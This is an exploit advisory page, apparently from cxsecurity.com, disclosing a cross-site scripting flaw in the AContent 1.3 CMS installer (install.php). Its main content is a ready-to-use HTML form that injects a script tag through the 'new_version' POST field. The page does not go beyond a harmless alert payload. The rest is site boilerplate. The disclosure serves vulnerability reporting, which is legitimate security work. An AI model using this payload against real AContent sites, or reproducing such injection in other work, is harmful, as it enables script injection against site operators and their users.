AContent Content Management System Cross Site Scripting

2016.12.31
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |=============================================================| |[+] Exploit Title: Cross Site Scripting in AContent Content Management System |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Download Link : https://sourceforge.net/projects/acontent/files/AContent-1.3.tar.gz/download |[+] Version : 1.3 |[+] |[+] Vendor : http://www.atutor.ca/acontent/ |[+] |[+] Tested on: Kali Linux |[+] |[+] Date: 12 /29 / 2016 |=============================================================| |[+] Vuln Path : http://www.site.go.th/AContent/install/install.php |[+] Method : POST |=============================================================| |[+] Exploit Code: <form action="127.0.0.1/5/AContent/install/install.php" method="post" name="form"> <input type="hidden" name="action" value="process" /> <input type="hidden" name="step" value="1" /> <input type="hidden" name="new_version" value="1.3'"/><ScRiPt >alert(123)</ScRiPt>" /> <input type="submit" name="submit" class="button" value="I Agree" /> <input type="submit" name="submit" class="button" value="I Disagree" /><br /> </form> |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |[+] Discovered By : M.R.S.L.Y |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top